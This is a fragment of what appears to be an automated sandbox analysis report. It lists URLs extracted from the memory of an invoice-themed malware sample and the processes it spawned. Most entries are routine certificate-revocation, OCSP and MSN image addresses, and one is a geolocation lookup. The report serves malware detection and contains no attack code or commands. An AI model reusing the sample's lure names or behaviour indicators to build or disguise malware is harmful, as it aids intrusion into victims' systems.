found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
              Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globals
              Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.360708645.0000000003E02000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.480125724.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.563713408.0000000006E90000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.529750715.0000000000884000.00000004.00000020.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://geoplugin.net/json.gp
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: bhv8995.tmp.39.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://ocsp.digicert.com0E
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: bhv8995.tmp.39.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://ocsp.pki.goog/gsr202
